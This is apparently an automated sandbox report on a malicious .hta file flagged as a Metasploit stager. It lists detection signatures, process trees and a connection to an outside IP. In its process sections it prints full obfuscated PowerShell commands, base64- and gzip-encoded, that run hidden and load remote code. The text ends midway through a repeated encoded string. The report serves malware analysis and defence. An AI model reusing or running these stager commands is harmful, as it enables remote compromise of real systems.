Analysis Overview
SHA256
8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3
Threat Level: Known bad
The file 8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3.hta was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-31 01:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 01:24
Reported
2024-05-31 01:26
Platform
win7-20240221-en
Max time kernel
132s
Max time network
149s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBFAFAAMQAyAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAewAxAH0AWABxACcAJwArACcAJwBuAC8AdwBhAHEAUQBiAEsAcwBFAG0ANQBjADIAVABhAFIASwB0ADgAWQBCAG4AQQBRAEMAYwBZAEEAQQBoADAANABiAGUANwBHADMAVwBYAHUASgB2AFEANgBoAHYAZgA3ADMAbQA4AFYAMgBTAEsALwBKAFgAZQA2AGsAVwBrAHIAWQBsADUAbgBaADIAVwBlAGUAbQBkAGwAVgBGAG4AdQBDADgAbABqAFoATwBzAHEAMwB0ADIAewAxAH0AVQA0AGgAdgBpAEIARQBlAEsAVgByAGsALwB4ADEAVwBsAEUAdAAnACcAKwAnACcAcgA2AGYAcQB1AHkAVAByAG4AeQBXAGQARQBXAGEATAAyADIAZQBZAFIAcAB2AEQAdwB7ADEAfQBiAG0AJwAnACsAJwAnAGQASgBRAG0ASwBSAHoAMgB0AGQASQBsAEMAYQBrAHUAaQBHAFUAWgBKAHEAdQB2AEsAbgBNAGcAMQBKAFEAZwA0AHUAYgByADQAUQBUAHkAagBmAGwATQBvAGYAdABTADcAagBOADUAZwBWAFkAdABzADIAOQBrAEsAaQBIAEsARABZAGwAMwB2AG4AMwBNAFAAUwBxAFoAcQA3AFoAbABSAG8ANgB1AHsAMQB9AC8AcQAvAHIAaQBvAEwANgBzAG4AZAB4AGwAbQBLAFcAYQA2AG0ANQBUAFEAYQBLAGEAegA1AGkAcQBLADkAOQAxACcAJwArACcAJwBlAGUARABWAGQAawAwADAAdABVAHsAMQB9ADkAaABLAGQAOABKAFcAcABUAEcAagBjAGIAdABYAEcAYwA0AGgAVQBaAGcATABWADcAMABpAGMAaQA1AEgANgBxAHcAbAAzADIAdAAwAG0ASQB5AEoASgA0AGQAeQBsAHAASgBaAGYAUgBWAEIAZwBPAEUAewAxAH0ANABoADMAMAA5AEkAbQBxAHAAVgBaAFMASAB0AEwANQBiAEwAMwA3AFIARgBjAGYAaABsAEYAZwBzAGEAawBaAG8AVABDADUATAB3AHQAVQB1AFMAZQB7ADEAfQBxAFIAdABOAGIARABzAGMALwBJAEoAVgBrAHQAUQBjAHMAVgBDAFkAMgBEAHAAYQA2AEQAMgBEADIALwBKAFYAbwBsAHoAaABpACcAJwArACcAJwByAEsAdgAvAEYAagAnACcAKwAnACcARABZAGcAbQB4AEsANgAxAHkAcABwAFQANQBWAEEAYQBpAGcAUwB2AFEAcgB4AC8AUABtAGEAZgBlADUAbgBqAE8AUwBLADYAagBOAHsAMQB9AFMAZwByAG8AOABPAFUAMABBAE8AeQB7ADEAfQBTAC8AaABXAEoAVwAxAHUAdQAnACcAKwAnACcAdgBXAHoAWgA0AGkAegBYAHkAaQAvAHgAVwA2AEgAZwBMAC8AYQBrAEsAZAAwAHAALwB4AFoATQBhAHQASwBIADQANwBHAGcAaQBkAGIAbQBGAGEAdQBrAG8AegBvAHkAMABlADAAbABVAHIAUwB7ADEAfQB6AEMAUABxADYAOAAxAFYAeQA5ADEAUQBmAE0AdQBoAEkAWABGAGgARgBOAC8AdQBWAGYALwBJAGYAYQBWAHMASABrAFMAMgBGAEwAcQBaAFMAcgBiAFoARQBWACcAJwArACcAJwBqAFkAbQA5AGoASABGAEcAdgBaAEsAdgAyAFgARQBqAEkAaQBwAEUAZABKAHIAVgBTAGIAQQBBAE8AYQBtAHEAeABRAFgAeQBiAE0AQgBKAGcASQBWAEcAVwB6AFAAaABKADcAUwBTAGkANABsAEgAWAB5AGkAagB6AFMAWQBJADgAQwBHAHMASwBYAGsASABFADkAUgB7ADEAfQBkAHkAUQBPAG4AcQAnACcAKwAnACcAVQA3AGMASgB4AEgAQQBsADgAewAxAH0AQgBxAHAAVQBWADUAQQBnAHAAcABZAHUAOAAyAEoAYQBuAHkAegBrAEkAcQBXADIARwAwADcAUwAnACcAKwAnACcAcQBEAEQATgBJAFUAcQB7ADEAfQBxAHUAQQBRAHoANABsAGMAVgBGAEsAZQAwADIARQBLAFoANABMAHUAaAB1AG4AZQAzAG4AegBGAEIAUABaAHkASwAwAHQAeABTAC8AegB1AGUAeABiAGwAdABIAHEAYwBpAHkAVAB5AEkATABHAEIAdwA1AGEANgBKAFIAegBHAFQAawBGAFMAVgBIAHYAVwBKAHQAWABWAHAAVQBKADYAdgBQAGcAdABJAEcAegBNAEcAMgBRAE8AVwA3AGkARQBnAHMAQwBLAEIAYwBJAFgAawBTAHcASwB1ADUAdAB6AFEAYQB5ADQAUgBUAHIAUgBtAEoAQQAnACcAKwAnACcASwBoAFgAZABuAG8ATQBCAHgAQQBrAFMAaQBTAFoATQBjAHcASABCAEIAZgBmAGMAbgBWAE0AaAB0ACcAJwArACcAJwB5ADYAawB0AHcAUwBsAFMAZQBPAEEAbwBSAGQAeABrAFgAVgBXAFYAQwBFAHcARgBWAFMAQQBKADkARgAvADQALwBMADMANAB1AFAANwBrADcANwBZAFEAVQBFAGQATABLAFIARgB0AFkAVwB5AEUAegBvAGUASQAvAFMASwBJAFcASQBPADAAZwBTAFEAVABBADAAVQBsADQAWgBPAEcAVQBmAEcAegBsAHAAVQBaADcAWgAxAHoAUQBJAFkASgB2AFoAdgBmAGMAdQBTAFAAYwBQAHYAegBaAFQAcwB4AG8AMwBSAG4AYgBoAC8ANwBaAEsAUgBmAGIATQA3AHQAbgA5AEwAMQAyAE8AdQB4ADIAUABpAEcANgBDAFQAYgBlAHAAdwBIAHkALwBGAE8AZgBIAEwAbQBUAGwAbgBCAFAASABOAEUAZQBvAHQANgBJAG0AbABZAHIAOQBDAHoAegBDAHMAWgBqAFIAegBoAGQAUgA4AHcAYwAxAEwAcwBLAFAAVwBZAE8AdwBZAFkANwBTADAAMgA2ADYAVQAzADcAbgBtADEAOQAzAFQAUgBTAG8ARwB1AHIAMQBiAHMAMgBVAGIAUABaAHUAbQBpAGEAdAA0AEQAZQBqAE4AYQBEAFcAewAxAH0AUQBQAEkAcgBwADUATwBJAGMAeAAxAE4AJwAnACsAJwAnAFMATABjADgAdABKAEwAZABOAGgASgA2AGYAdAB5ADUAdABwAG8AegBPAGYAcwBwADcAUgA2AG8AUwByAEsAVQAvAGQAagB6AFAAYgBNAEkAdwBqAEgAOQB2ADkATABVAEkAVwA5ADUAdgA5ADcAWABYADkAawBsAC8AMQB2AE0AaABxAHgAZAB3ADQAYQByAGQAdQAwAFEAbAAnACcAKwAnACcAQwA3AGYAaABrADAAcgBIADQAMgBjAHgASwAwAE4AQwBZADQARwBEAE4AMABlAGkAdwB5AGEATwBnAGoAVQA0AGYATABFAHIAbQBvADMASABIAEcAbwAwADYARgBoAHAAMwB2ADkAegBaAFIAMABaAGcASABFADIAdgBjAFcAaABOAEoAdwAwADYAWAAxADkAZgBoAGoARAB2AGIASABxAGoATQA4AE4AcwBPAFQANwA1AHkAdQBjAGIAQQBLADcATABFAFEANAB1AFEAUwBaAG8ATgA3AHgAdwBCAFQATAAyAGUAMgBTADkASAAvAEMAMABnAFcAOAB0AGoAaQB5AFEANgBjAHoAdgBVAEQAZQBjAHIAVAB0AEQAQgB2AHQAWAA0AHcAWgBIAEUAegBhADQAeAB1AGgAOAB2AHUAMABZAFIAbgAwADIAYgBLAEcAZQB5AGEAZgBkAEEASQAxAEEASABBAGYAVwBDAEsAUAAwADMAdgA1AHEARwAvAFcASgB6AC8AMwBwAGgAOABGAHMAWgBVAHkAdQAyAGEARgBoAHQAMABmAEQAOABGAHIAZQAyAFYAaABIADgAdgB7ADEAfQBtAFoANQA5ADUAOAAvAHIARwB1AHoAagA4AGQARAA2AGwAawA0AGkAagBzAFcARgBNADMAZwBFAGwARgBtAE0AYQBpADIAWgBqAFcAYwBrADIAWABWAGsAOQAzADcANgBwAFAASABRAG4ANAB5AGYATQBlAEsAawB6ADkASABHAFMAaABwAGcAQgBZADYARABtAGwAOABuAGIANABVAG0AbgBLAE8AUgBEAFQAcQAnACcAKwAnACcAVwBHAHAAcwBFADcANABKACcAJwArACcAJwBZAGsATQBXAEgAUQBQAGEARwAvAGwAbgBSAEgAagBIAEYAUAB0AHAAQgBkAHcAWQBmADIAbABUAGMAVgAyAGUAUABHAHoAcwA2AG4ANQAwAGEANgA4AGkAaQBvADcAMwB0AEwAdQBYAFIAOABQAEEAYwBmAEkAWQBYADgAaAA5AG8ANQBpAFEATQBSAFYAcwAyAEgAcABtAGwAQwBVAHoAQQBmAHoATgBZAHUAVQBWADUALwByAHoAWgBmAGIAegBVAHcAVgBaAFYATgBaAFEAZABMAGIAcABuAHQATABJAE0AeAB1AGwASQAwADcAVgBmAGoAQgBLADgARwBBAGUAWAByAFoAYQBSAGUAQQBnADEATwB2AG8AVgBhAEEAewAxAH0AVQB2AHoAMwA4AEoAbgBjAFUANQBlAHcAcABjAGMAYQAnACcAKwAnACcAdABIAEYAdQB4AHgAQQA4AEQAcQBjAE8AMgBGAGYAQwA5AEkAYwBvAEQANgBBAGIAbABUAEsAawBMADIAMAA2AGYAOQB1AFgASQB6AHUAZgB7ADEAfQBWAGQAQwBsAEsAVwBBAGcALwAvAHIALwBSACcAJwArACcAJwBaAGIALwAyAEQANwB1AHYAbwBwAEIAWgB6AGEASAA1AGEAZgBuAEgAaABTAGMATgA0AEoAYwBCAE0ATQBWAFUAZwBKAHcATAAnACcAKwAnACcAdABaAGkAUgAvAEkAbgB3AFAAQQA1AEYAaABqAHkASgBMAG8AUQBHAEUAbQBCAFYAZgBQAEwAWgBmAEoARwBKAGcAdwBFADgAeABIAGIATgA0AEMAOABYAEQAbwBXAFMAcQB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwArACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMEP12UCA7VWbW/aSBD{1}Xq'+'n/waqQbKsEm5c2TaRKt8YBnAQCcYAAh04be7G3WXuJvQ6hvf73m8V2SK/JXe6kWkrYl5nZ2WeemdlVFnuC8ljZOsq3t2{1}U4hviBEeKVrk/x1WlEt'+'r6fquyTrnyWdEWaL22eYRpvDw{1}bm'+'dJQmKRz2tdIlCakuiGUZJquvKnMg1JQg4ubr4QTyjflMoftS7jN5gVYts29kKiHKDYl3vn3MPSqZq7ZlRo6u{1}/q/rioL6sndxlmKWa6m5TQaKaz5iqK991'+'eeDVdk00tU{1}9hKd8JWpTGjcbtXGc4hUZgLV70ici5H6qwl32t0mIyJJ4dylpJZfRVBgOE{1}4h309ImqpVZSHtL5bL37RFcfhlFgsakZoTC5LwtUuSe{1}qRtNbDsc/IJVktQcsVCY2Dpa6D2D2/JVolzhi'+'rKv/Fj'+'DYgmxK61yppT5VAaigSvQrx/Pmafe5njOSK6jN{1}Sgro8OU0AOy{1}S/hWJW1uu'+'vWzZ4izXyi/xW6HgL/akKd0p/xZMatKH47GgidbmFaukozoy0e0lUrS{1}zCPq681Vy91QfMuhIXFhFN/uVf/IfaVsHkS2FLqZSrbZEV'+'jYm9jHFGvZKv2XEjIipEdJrVSbAAOamqxQXybMBJgIVGWzPhJ7SSi4lHXyijzSYI8CGsKXkHE9R{1}dyQOnq'+'U7cJxHAl8{1}BqpUV5AgppYu82JanyzkIqW2G07S'+'qDDNIUq{1}quAQz4lcVFKe02EKZ4Luhune3nzFBPZyK0txS/zuexbltHqciyTyILGBw5a6JRzGTkFSVHvWJtXVpUJ6vPgtIGzMG2QOW7iEgsCKBcIXkSwKu5tzQay4RTrRmJA'+'KhXdnoMBxAkSiSZMcwHBBffcnVMht'+'y6ktwSlSeOAoRdxkXVWVCEwFVSAJ9F/4/L34uP7k77YQUEdLKRFtYWyEzoeI/SKIWIO0gSQTA0Ul4ZOGUfGzlpUZ7Z1zQIYJvZvfcuSPcPvzZTsxo3Rnbh/7ZKRfbM7tn9L12Oux2PiG6CTbepwHy/FOfHLmTlnBPHNEeot6ImlYr9CzzCsZjRzhdR8wc1LsKPWYOwYY7S0266U37nm193TRSoGur1bs2UbPZumiat4DejNaDW{1}QPIrp5OIcx1N'+'SLc8tJLdNhJ6fty5tpozOfsp7R6oSrKU/djzPbMIwjH9v9LUIW95v97XX9kl/1vMhqxdw4ardu0Ql'+'C7fhk0rH42cxK0NCY4GDN0eiwyaOgjU4fLErmo3HHGo06Fhp3v9zZR0ZgHE2vcWhNJw06X19fhjDvbHqjM8NsOT75yucbAK7LEQ4uQSZoN7xwBTL2e2S9H/C0gW8tjiyQ6czvUDecrTtDBvtX4wZHEza4xuh8vu0YRn02bKGeyafdAI1AHAfWCKP03v5qG/WJz/3ph8FsZUyu2aFht0fD8Fre2VhH8v{1}mZ5958/rGuzj8dD6lk4ijsWFM3gElFmMai2ZjWck2XVk9376pPHQn4yfMeKkz9HGShpgBY6Dml8nb4UmnKORDTq'+'WGpsE74J'+'YkMWHQPaG/lnRHjHFPtpBdwYf2lTcV2ePGzs6n50a68iio73tLuXR8PAcfIYX8h9o5iQMRVs2HpmlCUzAfzNYuUV5/rzZfbzUwVZVNZQdLbpntLIMxulI07VfjBK8GAeXrZaReAg1OvoVaA{1}Uvz38JncU5ewpcca'+'tHFuxxA8DqcO2FfC9IcoD6AblTKkL206f9uXIzuf{1}VdClKWAg//r/R'+'Zb/2D7uvopBZzaH5afnHhScN4JcBMMVUgJwL'+'tZiR/InwPA5FhjyJLoQGEmBVfPLZfJGJgwE8xHbN4C8XDoWSqwsAAA{0}{0}')-f'=','+')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| CN | 1.14.247.162:40001 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 985cd0dc8ffb66e582df00c5c27de512 |
| SHA1 | e5c4a366f9349c5a01c0b7fdec94339cf88ae801 |
| SHA256 | 157fee899ba6fc9b97b055d734fe58995d18990c49cdb2043aa6648f0c02cc7f |
| SHA512 | d56d55ea6841dc39e6af384c59b4705b77bffaaaf9a42d2ffe98ca35da56f9922f7ffa47f732bb17ee5007a1aceb2c3b308bea2c652e6bf2d224b14b46129738 |
memory/2872-7-0x0000000005040000-0x0000000005041000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-31 01:24
Reported
2024-05-31 01:26
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 728 wrote to memory of 964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 728 wrote to memory of 964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 728 wrote to memory of 964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 4408 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 4408 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 4408 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBFAFAAMQAyAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAewAxAH0AWABxACcAJwArACcAJwBuAC8AdwBhAHEAUQBiAEsAcwBFAG0ANQBjADIAVABhAFIASwB0ADgAWQBCAG4AQQBRAEMAYwBZAEEAQQBoADAANABiAGUANwBHADMAVwBYAHUASgB2AFEANgBoAHYAZgA3ADMAbQA4AFYAMgBTAEsALwBKAFgAZQA2AGsAVwBrAHIAWQBsADUAbgBaADIAVwBlAGUAbQBkAGwAVgBGAG4AdQBDADgAbABqAFoATwBzAHEAMwB0ADIAewAxAH0AVQA0AGgAdgBpAEIARQBlAEsAVgByAGsALwB4ADEAVwBsAEUAdAAnACcAKwAnACcAcgA2AGYAcQB1AHkAVAByAG4AeQBXAGQARQBXAGEATAAyADIAZQBZAFIAcAB2AEQAdwB7ADEAfQBiAG0AJwAnACsAJwAnAGQASgBRAG0ASwBSAHoAMgB0AGQASQBsAEMAYQBrAHUAaQBHAFUAWgBKAHEAdQB2AEsAbgBNAGcAMQBKAFEAZwA0AHUAYgByADQAUQBUAHkAagBmAGwATQBvAGYAdABTADcAagBOADUAZwBWAFkAdABzADIAOQBrAEsAaQBIAEsARABZAGwAMwB2AG4AMwBNAFAAUwBxAFoAcQA3AFoAbABSAG8ANgB1AHsAMQB9AC8AcQAvAHIAaQBvAEwANgBzAG4AZAB4AGwAbQBLAFcAYQA2AG0ANQBUAFEAYQBLAGEAegA1AGkAcQBLADkAOQAxACcAJwArACcAJwBlAGUARABWAGQAawAwADAAdABVAHsAMQB9ADkAaABLAGQAOABKAFcAcABUAEcAagBjAGIAdABYAEcAYwA0AGgAVQBaAGcATABWADcAMABpAGMAaQA1AEgANgBxAHcAbAAzADIAdAAwAG0ASQB5AEoASgA0AGQAeQBsAHAASgBaAGYAUgBWAEIAZwBPAEUAewAxAH0ANABoADMAMAA5AEkAbQBxAHAAVgBaAFMASAB0AEwANQBiAEwAMwA3AFIARgBjAGYAaABsAEYAZwBzAGEAawBaAG8AVABDADUATAB3AHQAVQB1AFMAZQB7ADEAfQBxAFIAdABOAGIARABzAGMALwBJAEoAVgBrAHQAUQBjAHMAVgBDAFkAMgBEAHAAYQA2AEQAMgBEADIALwBKAFYAbwBsAHoAaABpACcAJwArACcAJwByAEsAdgAvAEYAagAnACcAKwAnACcARABZAGcAbQB4AEsANgAxAHkAcABwAFQANQBWAEEAYQBpAGcAUwB2AFEAcgB4AC8AUABtAGEAZgBlADUAbgBqAE8AUwBLADYAagBOAHsAMQB9AFMAZwByAG8AOABPAFUAMABBAE8AeQB7ADEAfQBTAC8AaABXAEoAVwAxAHUAdQAnACcAKwAnACcAdgBXAHoAWgA0AGkAegBYAHkAaQAvAHgAVwA2AEgAZwBMAC8AYQBrAEsAZAAwAHAALwB4AFoATQBhAHQASwBIADQANwBHAGcAaQBkAGIAbQBGAGEAdQBrAG8AegBvAHkAMABlADAAbABVAHIAUwB7ADEAfQB6AEMAUABxADYAOAAxAFYAeQA5ADEAUQBmAE0AdQBoAEkAWABGAGgARgBOAC8AdQBWAGYALwBJAGYAYQBWAHMASABrAFMAMgBGAEwAcQBaAFMAcgBiAFoARQBWACcAJwArACcAJwBqAFkAbQA5AGoASABGAEcAdgBaAEsAdgAyAFgARQBqAEkAaQBwAEUAZABKAHIAVgBTAGIAQQBBAE8AY